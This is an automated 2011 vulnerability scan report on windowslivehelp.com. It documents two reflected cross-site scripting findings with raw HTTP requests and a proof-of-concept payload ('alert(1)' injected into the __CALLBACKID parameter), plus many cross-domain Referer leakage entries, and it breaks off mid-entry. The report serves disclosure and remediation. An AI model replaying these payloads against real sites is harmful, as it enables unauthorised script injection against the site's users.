Potential XSS, Cross Site Scripting, windowslivehelp.com, CWE-79, CAPEC-86
Note: Potential CWE-79 Issue
Report generated by XSS.CX at Sat Oct 29 09:18:02 CDT 2011.
Contents
1. Cross-site scripting (reflected)
1.1. http://windowslivehelp.com/searchresults.aspx [query parameter]
1.2. http://windowslivehelp.com/solution.aspx [__CALLBACKID parameter]
2. Cross-domain Referer leakage
2.1. http://windowslivehelp.com/ask.aspx
2.2. http://windowslivehelp.com/ask.aspx
2.3. http://windowslivehelp.com/forums.aspx
2.4. http://windowslivehelp.com/forums.aspx
2.5. http://windowslivehelp.com/product.aspx
2.6. http://windowslivehelp.com/product.aspx
2.7. http://windowslivehelp.com/product.aspx
2.8. http://windowslivehelp.com/product.aspx
2.9. http://windowslivehelp.com/searchresults.aspx
2.10. http://windowslivehelp.com/searchresults.aspx
2.11. http://windowslivehelp.com/searchresults.aspx
2.12. http://windowslivehelp.com/searchresults.aspx
2.13. http://windowslivehelp.com/solution.aspx
2.14. http://windowslivehelp.com/solution.aspx
2.15. http://windowslivehelp.com/solution.aspx
2.16. http://windowslivehelp.com/solution.aspx
2.17. http://windowslivehelp.com/solutions.aspx
2.18. http://windowslivehelp.com/solutions.aspx
3. Cross-domain script include
3.1. http://windowslivehelp.com/
3.2. http://windowslivehelp.com/ack.aspx
3.3. http://windowslivehelp.com/forums.aspx
3.4. http://windowslivehelp.com/product.aspx
3.5. http://windowslivehelp.com/searchresults.aspx
3.6. http://windowslivehelp.com/solution.aspx
3.7. http://windowslivehelp.com/solutions.aspx
3.8. http://windowslivehelp.com/tou.aspx
4. Content type incorrectly stated
1. Cross-site scripting (reflected)
next
There are 2 instances of this issue:
Issue background
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Issue remediation
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:- Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
- User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
1.1. http://windowslivehelp.com/searchresults.aspx [query parameter]
next
Summary
Severity: |
High |
Confidence: |
Firm |
Host: |
http://windowslivehelp.com |
Path: |
/searchresults.aspx |
Issue detail
The value of the query request parameter is copied into the HTML document as plain text between tags. The payload fe57b<a>e7ee0d33c0b was submitted in the query parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /searchresults.aspx?query=fe57b<a>e7ee0d33c0b HTTP/1.1 Host: windowslivehelp.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 4.0.30319 Set-Cookie: HVViewedTimes=7; path=/ Set-Cookie: ViewedTimes=7; path=/ X-Powered-By: ASP.NET Date: Wed, 26 Oct 2011 18:21:27 GMT Connection: close Content-Length: 33078
<html id="ctl00_htmlID" xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><title> Search Results </title><meta http-equiv="content-type" content="text/html; charset=UTF-8" /><link rel=" ...[SNIP]... <span style="font-weight:bold">fe57b<a>e7ee0d33c0b</a> ...[SNIP]...
|
1.2. http://windowslivehelp.com/solution.aspx [__CALLBACKID parameter]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://windowslivehelp.com |
Path: |
/solution.aspx |
Issue detail
The value of the __CALLBACKID request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 48e71%3balert(1)//503466e3f79 was submitted in the __CALLBACKID parameter. This input was echoed as 48e71;alert(1)//503466e3f79 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
POST /solution.aspx?solutionid=848f023d-1637-4b6f-a7d4-ebb58ffdd9dc HTTP/1.1 Host: windowslivehelp.com Proxy-Connection: keep-alive Content-Length: 928 Origin: http://windowslivehelp.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Accept: */* Referer: http://windowslivehelp.com/solution.aspx?solutionid=848f023d-1637-4b6f-a7d4-ebb58ffdd9dc Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: WT_NVR=0=/; ASP.NET_SessionId=jxu3f1gj4rgf2h4hxyqjy3k5; UTCOffset=-300; LastProductId=13; HVViewedTimes=8; ViewedTimes=8; WT_FPC=id=50.23.123.106-382843424.30173056:lv=1319642543020:ss=1319640947467; fmshb=0,1319654387699; vvv=848f023d-1637-4b6f-a7d4-ebb58ffdd9dc
ctl00_RadScriptManager1_TSM=&__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwULLTE2Njc3NjU1ODFkGAMFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYDBRZjdGwwMCRzZWxTZWFyY2hQcm9kdWN0BShjdGwwMCRzaW5nbGVDb ...[SNIP]... 24singleColumn%24ProductBar%24selProduct=Select%20a%20product.&ctl00_singleColumn_ProductBar_selProduct_ClientState=&ctl00_rightColumn4_pnlVote_ClientState=&__CALLBACKID=ctl00%24rightColumn4%24pnlVote48e71%3balert(1)//503466e3f79&__CALLBACKPARAM=%7B%20Value%20%3A%20%22848f023d-1637-4b6f-a7d4-ebb58ffdd9dc~1%22%7D&__EVENTVALIDATION=%2FwEWAgLW%2FpS7DALE5ML0AgJeObbD3gb7gxqlhz5nPFWthK8S |
Response
HTTP/1.1 200 OK Cache-Control: private, no-store Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 4.0.30319 Set-Cookie: HVViewedTimes=10; path=/ Set-Cookie: LastProductId=13; path=/ X-Powered-By: ASP.NET Date: Wed, 26 Oct 2011 18:41:15 GMT Content-Length: 155
eThe target 'ctl00$rightColumn4$pnlVote48e71;alert(1)//503466e3f79' for the callback could not be found or did not implement ICallbackEventHandler. |
2. Cross-domain Referer leakage
previous
next
There are 18 instances of this issue:
Issue background
When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.
If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.
You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.
Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.
Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.
Issue remediation
The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.
2.1. http://windowslivehelp.com/ask.aspx
previous
next
Summary
Severity: |
Information |
Confidence: |
Certain |
Host: |
http://windowslivehelp.com |
Path: |
/ask.aspx |
Issue detail
The page was loaded from a URL containing a query string:- http://windowslivehelp.com/ask.aspx?productid=13&cancel=product.aspx?productid=13
The response contains the following links to other domains:- http://go.microsoft.com/?linkid=4412893
- http://go.microsoft.com/fwlink/?LinkID=223851&clcid=0x409
- http://go.microsoft.com/fwlink/?LinkID=223852&clcid=0x409
- http://go.microsoft.com/fwlink/?LinkId=74170
- http://m.webtrends.com/dcsysz48l000004fm6ldsk8rj_6j9y/njs.gif?dcsuri=/nojavascript&WT.js=No
- https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1319653279&rver=6.0.5286.0&wp=MBI&wreply=http:%2F%2Fwindowslivehelp.com%2Fask.aspx%3Fproductid%3D13%26cancel%3Dproduct.aspx%3Fproductid%3D13&lc=1033&id=259655
Request
GET /ask.aspx?productid=13&cancel=product.aspx?productid=13 HTTP/1.1 Host: windowslivehelp.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 4.0.30319 Set-Cookie: HVViewedTimes=7; path=/ Set-Cookie: ViewedTimes=7; path=/ X-Powered-By: ASP.NET Date: Wed, 26 Oct 2011 18:21:19 GMT Connection: close Content-Length: 28065
<html id="ctl00_htmlID" xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><title> Windows Live Solution Center </title><meta http-equiv="content-type" content="text/html; charset=UTF-8" ...[SNIP]... <span id="ctl00_lblSignIn"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1319653279&rver=6.0.5286.0&wp=MBI&wreply=http:%2F%2Fwindowslivehelp.com%2Fask.aspx%3Fproductid%3D13%26cancel%3Dproduct.aspx%3Fproductid%3D13&lc=1033&id=259655">Sign in</a> ...[SNIP]... <br> <a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1319653279&rver=6.0.5286.0&wp=MBI&wreply=http:%2F%2Fwindowslivehelp.com%2Fask.aspx%3Fproductid%3D13%26cancel%3Dproduct.aspx%3Fproductid%3D13&lc=1033&id=259655">Continue</a> ...[SNIP]... <li><a target="_blank" href="http://go.microsoft.com/fwlink/?LinkID=223852&clcid=0x409"><span id="ctl00_LocResource11_lblResource"> ...[SNIP]... <li><a target="_blank" href="http://go.microsoft.com/fwlink/?LinkId=74170"><span id="ctl00_LocResource10_lblResource"> ...[SNIP]... <li><a target="_blank" href="http://go.microsoft.com/?linkid=4412893"><span id="ctl00_LocResource9_lblResource"> ...[SNIP]... <li><a target="_blank" href="http://go.microsoft.com/fwlink/?LinkID=223851&clcid=0x409"><span id="ctl00_LocResource8_lblResource"> ...[SNIP]... <noscript> <img alt="" border="0" ID="DCSIMG" width="1" height="1" src="http://m.webtrends.com/dcsysz48l000004fm6ldsk8rj_6j9y/njs.gif?dcsuri=/nojavascript&WT.js=No"/> </noscript> ...[SNIP]...
|
2.2. http://windowslivehelp.com/ask.aspx
previous
next
Summary
Severity: |
Information |
Confidence: |
Certain |
Host: |
http://windowslivehelp.com |
Path: |
/ask.aspx |
Issue detail
The page was loaded from a URL containing a query string:- http://windowslivehelp.com/ask.aspx?productid=13
The response contains the following links to other domains:- http://go.microsoft.com/?linkid=4412893
- http://go.microsoft.com/fwlink/?LinkID=223851&clcid=0x409
- http://go.microsoft.com/fwlink/?LinkID=223852&clcid=0x409
- http://go.microsoft.com/fwlink/?LinkId=74170
- http://m.webtrends.com/dcsysz48l000004fm6ldsk8rj_6j9y/njs.gif?dcsuri=/nojavascript&WT.js=No
- https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1319653279&rver=6.0.5286.0&wp=MBI&wreply=http:%2F%2Fwindowslivehelp.com%2Fask.aspx%3Fproductid%3D13&lc=1033&id=259655
Request
GET /ask.aspx?productid=13 HTTP/1.1 Host: windowslivehelp.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 4.0.30319 Set-Cookie: HVViewedTimes=7; path=/ Set-Cookie: ViewedTimes=7; path=/ X-Powered-By: ASP.NET Date: Wed, 26 Oct 2011 18:21:19 GMT Connection: close Content-Length: 27778
<html id="ctl00_htmlID" xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><title> Windows Live Solution Center </title><meta http-equiv="content-type" content="text/html; charset=UTF-8" ...[SNIP]... <span id="ctl00_lblSignIn"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1319653279&rver=6.0.5286.0&wp=MBI&wreply=http:%2F%2Fwindowslivehelp.com%2Fask.aspx%3Fproductid%3D13&lc=1033&id=259655">Sign in</a> ...[SNIP]... <br> <a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1319653279&rver=6.0.5286.0&wp=MBI&wreply=http:%2F%2Fwindowslivehelp.com%2Fask.aspx%3Fproductid%3D13&lc=1033&id=259655">Continue</a> ...[SNIP]... <li><a target="_blank" href="http://go.microsoft.com/fwlink/?LinkID=223852&clcid=0x409"><span id="ctl00_LocResource11_lblResource"> ...[SNIP]... <li><a target="_blank" href="http://go.microsoft.com/fwlink/?LinkId=74170"><span id="ctl00_LocResource10_lblResource"> ...[SNIP]... <li><a target="_blank" href="http://go.microsoft.com/?linkid=4412893"><span id="ctl00_LocResource9_lblResource"> ...[SNIP]... <li><a target="_blank" href="http://go.microsoft.com/fwlink/?LinkID=223851&clcid=0x409"><span id="ctl00_LocResource8_lblResource"> ...[SNIP]... <noscript> <img alt="" border="0" ID="DCSIMG" width="1" height="1" src="http://m.webtrends.com/dcsysz48l000004fm6ldsk8rj_6j9y/njs.gif?dcsuri=/nojavascript&WT.js=No"/> </noscript> ...[SNIP]...
|
2.3. http://windowslivehelp.com/forums.aspx
previous
next
Summary
Severity: |
Information |
Confidence: |
Certain |
Host: |
http://windowslivehelp.com |
Path: |
/forums.aspx |
Issue detail
The page was loaded from a URL containing a query string:- http://windowslivehelp.com/forums.aspx?productid=13
The response contains the following links to other domains:- http://go.microsoft.com/?linkid=4412893
- http://go.microsoft.com/fwlink/?LinkID=223851&clcid=0x409
- http://go.microsoft.com/fwlink/?LinkID=223852&clcid=0x409
- http://go.microsoft.com/fwlink/?LinkId=74170
- http://m.webtrends.com/dcsysz48l000004fm6ldsk8rj_6j9y/njs.gif?dcsuri=/nojavascript&WT.js=No
- http://support.microsoft.com/common/script/fx/PluginTriggerStrapper.js
- https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1319653281&rver=6.0.5286.0&wp=MBI&wreply=http:%2F%2Fwindowslivehelp.com%2Fforums.aspx%3Fproductid%3D13&lc=1033&id=259655
Request
GET /forums.aspx?productid=13 HTTP/1.1 Host: windowslivehelp.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 4.0.30319 Set-Cookie: HVViewedTimes=7; path=/ Set-Cookie: LastProductId=13; path=/ Set-Cookie: ViewedTimes=7; path=/ X-Powered-By: ASP.NET Date: Wed, 26 Oct 2011 18:21:20 GMT Connection: close Content-Length: 52555
<html id="ctl00_htmlID" xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><title> Profile Threads </title><meta http-equiv="content-type" content="text/html; charset=UTF-8" /><link rel= ...[SNIP]... <span id="ctl00_lblSignIn"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1319653281&rver=6.0.5286.0&wp=MBI&wreply=http:%2F%2Fwindowslivehelp.com%2Fforums.aspx%3Fproductid%3D13&lc=1033&id=259655">Sign in</a> ...[SNIP]... <li><a target="_blank" href="http://go.microsoft.com/fwlink/?LinkID=223852&clcid=0x409"><span id="ctl00_LocResource11_lblResource"> ...[SNIP]... <li><a target="_blank" href="http://go.microsoft.com/fwlink/?LinkId=74170"><span id="ctl00_LocResource10_lblResource"> ...[SNIP]... <li><a target="_blank" href="http://go.microsoft.com/?linkid=4412893"><span id="ctl00_LocResource9_lblResource"> ...[SNIP]... <li><a target="_blank" href="http://go.microsoft.com/fwlink/?LinkID=223851&clcid=0x409"><span id="ctl00_LocResource8_lblResource"> ...[SNIP]... <noscript> <img alt="" border="0" ID="DCSIMG" width="1" height="1" src="http://m.webtrends.com/dcsysz48l000004fm6ldsk8rj_6j9y/njs.gif?dcsuri=/nojavascript&WT.js=No"/> </noscript> ...[SNIP]... </script><script type="text/javascript" src="http://support.microsoft.com/common/script/fx/PluginTriggerStrapper.js"></script> ...[SNIP]...
|
2.4. http://windowslivehelp.com/forums.aspx
previous
next
Summary
Severity: |
Information |
Confidence: |
Certain |
Host: |
http://windowslivehelp.com |
Path: |
/forums.aspx |
Issue detail
The page was loaded from a URL containing a query string:- http://windowslivehelp.com/forums.aspx?forumid=d4afa807-b68a-4d48-bd2b-7771c7da51af
The response contains the following links to other domains:- http://go.microsoft.com/?linkid=4412893
- http://go.microsoft.com/fwlink/?LinkID=223851&clcid=0x409
- http://go.microsoft.com/fwlink/?LinkID=223852&clcid=0x409
- http://go.microsoft.com/fwlink/?LinkId=74170
- http://m.webtrends.com/dcsysz48l000004fm6ldsk8rj_6j9y/njs.gif?dcsuri=/nojavascript&WT.js=No
- http://support.microsoft.com/common/script/fx/PluginTriggerStrapper.js
- https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1319653280&rver=6.0.5286.0&wp=MBI&wreply=http:%2F%2Fwindowslivehelp.com%2Fforums.aspx%3Fforumid%3Dd4afa807-b68a-4d48-bd2b-7771c7da51af&lc=1033&id=259655
Request
GET /forums.aspx?forumid=d4afa807-b68a-4d48-bd2b-7771c7da51af HTTP/1.1 Host: windowslivehelp.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 4.0.30319 Set-Cookie: HVViewedTimes=7; path=/ Set-Cookie: LastProductId=13; path=/ Set-Cookie: ViewedTimes=7; path=/ X-Powered-By: ASP.NET Date: Wed, 26 Oct 2011 18:21:20 GMT Connection: close Content-Length: 52525
<html id="ctl00_htmlID" xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><title> Managing Your Network Threads </title><meta http-equiv="content-type" content="text/html; charset=UTF-8 ...[SNIP]... <span id="ctl00_lblSignIn"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1319653280&rver=6.0.5286.0&wp=MBI&wreply=http:%2F%2Fwindowslivehelp.com%2Fforums.aspx%3Fforumid%3Dd4afa807-b68a-4d48-bd2b-7771c7da51af&lc=1033&id=259655">Sign in</a> ...[SNIP]... <li><a target="_blank" href="http://go.microsoft.com/fwlink/?LinkID=223852&clcid=0x409"><span id="ctl00_LocResource11_lblResource"> ...[SNIP]... <li><a target="_blank" href="http://go.microsoft.com/fwlink/?LinkId=74170"><span id="ctl00_LocResource10_lblResource"> ...[SNIP]... <li><a target="_blank" href="http://go.microsoft.com/?linkid=4412893"><span id="ctl00_LocResource9_lblResource"> ...[SNIP]... <li><a target="_blank" href="http://go.microsoft.com/fwlink/?LinkID=223851&clcid=0x409"><span id="ctl00_LocResource8_lblResource"> ...[SNIP]... <noscript> <img alt="" border="0" ID="DCSIMG" width="1" height="1" src="http://m.webtrends.com/dcsysz48l000004fm6ldsk8rj_6j9y/njs.gif?dcsuri=/nojavascript&WT.js=No"/> </noscript> ...[SNIP]... </script><script type="text/javascript" src="http://support.microsoft.com/common/script/fx/PluginTriggerStrapper.js"></script> ...[SNIP]...
|
2.5. http://windowslivehelp.com/product.aspx
previous
next
Summary
Severity: |
Information |
Confidence: |
Certain |
Host: |
http://windowslivehelp.com |
Path: |
/product.aspx |
Issue detail
The page was loaded from a URL containing a query string:- http://windowslivehelp.com/product.aspx?productid=13
The response contains the following links to other domains:- http://go.microsoft.com/?linkid=4412893
- http://go.microsoft.com/fwlink/?LinkID=223851&clcid=0x409
- http://go.microsoft.com/fwlink/?LinkID=223852&clcid=0x409
- http://go.microsoft.com/fwlink/?LinkId=74170
- http://m.webtrends.com/dcsysz48l000004fm6ldsk8rj_6j9y/njs.gif?dcsuri=/nojavascript&WT.js=No
- http://support.microsoft.com/common/script/fx/PluginTriggerStrapper.js
- https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1319652076&rver=6.0.5286.0&wp=MBI&wreply=http:%2F%2Fwindowslivehelp.com%2Fproduct.aspx%3Fproductid%3D13&lc=1033&id=259655
Request
GET /product.aspx?productid=13 HTTP/1.1 Host: windowslivehelp.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1 Accept: */* Referer: http://windowslivehelp.com/product.aspx?productid=13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: WT_NVR=0=/; WT_FPC=id=50.23.123.106-382843424.30173056:lv=1317651416674:ss=1317650370882; ASP.NET_SessionId=jxu3f1gj4rgf2h4hxyqjy3k5; HVViewedTimes=1; LastProductId=13; ViewedTimes=1
|
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 4.0.30319 Set-Cookie: HVViewedTimes=7; path=/ Set-Cookie: LastProductId=13; path=/ Set-Cookie: ViewedTimes=7; path=/ X-Powered-By: ASP.NET Date: Wed, 26 Oct 2011 18:01:16 GMT Content-Length: 37711
<html id="ctl00_htmlID" xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><title> Profile Portal </title><meta http-equiv="content-type" content="text/html; charset=UTF-8" /><link rel=" ...[SNIP]... <span id="ctl00_lblSignIn"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1319652076&rver=6.0.5286.0&wp=MBI&wreply=http:%2F%2Fwindowslivehelp.com%2Fproduct.aspx%3Fproductid%3D13&lc=1033&id=259655">Sign in</a> ...[SNIP]... <li><a target="_blank" href="http://go.microsoft.com/fwlink/?LinkID=223852&clcid=0x409"><span id="ctl00_LocResource11_lblResource"> ...[SNIP]... <li><a target="_blank" href="http://go.microsoft.com/fwlink/?LinkId=74170"><span id="ctl00_LocResource10_lblResource"> ...[SNIP]... <li><a target="_blank" href="http://go.microsoft.com/?linkid=4412893"><span id="ctl00_LocResource9_lblResource"> ...[SNIP]... <li><a target="_blank" href="http://go.microsoft.com/fwlink/?LinkID=223851&clcid=0x409"><span id="ctl00_LocResource8_lblResource"> ...[SNIP]... <noscript> <img alt="" border="0" ID="DCSIMG" width="1" height="1" src="http://m.webtrends.com/dcsysz48l000004fm6ldsk8rj_6j9y/njs.gif?dcsuri=/nojavascript&WT.js=No"/> </noscript> ...[SNIP]... </script><script type="text/javascript" src="http://support.microsoft.com/common/script/fx/PluginTriggerStrapper.js"></script> ...[SNIP]...
|
2.6. http://windowslivehelp.com/product.aspx
previous
next
Summary
Severity: |
Information |
Confidence: |
Certain |
Host: |
http://windowslivehelp.com |
Path: |
/product.aspx |
Issue detail
The page was loaded from a URL containing a query string:- http://windowslivehelp.com/product.aspx?productid=13
The response contains the following links to other domains:- http://go.microsoft.com/?linkid=4412893
- http://go.microsoft.com/fwlink/?LinkID=223851&clcid=0x409
- http://go.microsoft.com/fwlink/?LinkID=223852&clcid=0x409
- http://go.microsoft.com/fwlink/?LinkId=74170
- http://m.webtrends.com/dcsysz48l000004fm6ldsk8rj_6j9y/njs.gif?dcsuri=/nojavascript&WT.js=No
- http://support.microsoft.com/common/script/fx/PluginTriggerStrapper.js
- https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1319652079&rver=6.0.5286.0&wp=MBI&wreply=http:%2F%2Fwindowslivehelp.com%2Fproduct.aspx%3Fproductid%3D13&lc=1033&id=259655
Request
GET /product.aspx?productid=13 HTTP/1.1 Host: windowslivehelp.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: http://windowslivehelp.com/product.aspx?productid=13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: WT_NVR=0=/; ASP.NET_SessionId=jxu3f1gj4rgf2h4hxyqjy3k5; HVViewedTimes=2; LastProductId=13; ViewedTimes=2; WT_FPC=id=50.23.123.106-382843424.30173056:lv=1319640947467:ss=1319640947467; fmshb=0,1319651749476; UTCOffset=-300
|
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 4.0.30319 Set-Cookie: HVViewedTimes=7; path=/ Set-Cookie: LastProductId=13; path=/ Set-Cookie: ViewedTimes=7; path=/ X-Powered-By: ASP.NET Date: Wed, 26 Oct 2011 18:01:18 GMT Content-Length: 37711
<html id="ctl00_htmlID" xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><title> Profile Portal </title><meta http-equiv="content-type" content="text/html; charset=UTF-8" /><link rel=" ...[SNIP]... <span id="ctl00_lblSignIn"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1319652079&rver=6.0.5286.0&wp=MBI&wreply=http:%2F%2Fwindowslivehelp.com%2Fproduct.aspx%3Fproductid%3D13&lc=1033&id=259655">Sign in</a> ...[SNIP]... <li><a target="_blank" href="http://go.microsoft.com/fwlink/?LinkID=223852&clcid=0x409"><span id="ctl00_LocResource11_lblResource"> ...[SNIP]... <li><a target="_blank" href="http://go.microsoft.com/fwlink/?LinkId=74170"><span id="ctl00_LocResource10_lblResource"> ...[SNIP]... <li><a target="_blank" href="http://go.microsoft.com/?linkid=4412893"><span id="ctl00_LocResource9_lblResource"> ...[SNIP]... <li><a target="_blank" href="http://go.microsoft.com/fwlink/?LinkID=223851&clcid=0x409"><span id="ctl00_LocResource8_lblResource"> ...[SNIP]... <noscript> <img alt="" border="0" ID="DCSIMG" width="1" height="1" src="http://m.webtrends.com/dcsysz48l000004fm6ldsk8rj_6j9y/njs.gif?dcsuri=/nojavascript&WT.js=No"/> </noscript> ...[SNIP]... </script><script type="text/javascript" src="http://support.microsoft.com/common/script/fx/PluginTriggerStrapper.js"></script> ...[SNIP]...
|
2.7. http://windowslivehelp.com/product.aspx
previous
next
Summary
Severity: |
Information |
Confidence: |
Certain |
Host: |
http://windowslivehelp.com |
Path: |
/product.aspx |
Issue detail
The page was loaded from a URL containing a query string:- http://windowslivehelp.com/product.aspx?productid=13
The response contains the following links to other domains:- http://go.microsoft.com/?linkid=4412893
- http://go.microsoft.com/fwlink/?LinkID=223851&clcid=0x409
- http://go.microsoft.com/fwlink/?LinkID=223852&clcid=0x409
- http://go.microsoft.com/fwlink/?LinkId=74170
- http://m.webtrends.com/dcsysz48l000004fm6ldsk8rj_6j9y/njs.gif?dcsuri=/nojavascript&WT.js=No
- http://support.microsoft.com/common/script/fx/PluginTriggerStrapper.js
- https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1319652054&rver=6.0.5286.0&wp=MBI&wreply=http:%2F%2Fwindowslivehelp.com%2Fproduct.aspx%3Fproductid%3D13&lc=1033&id=259655
Request
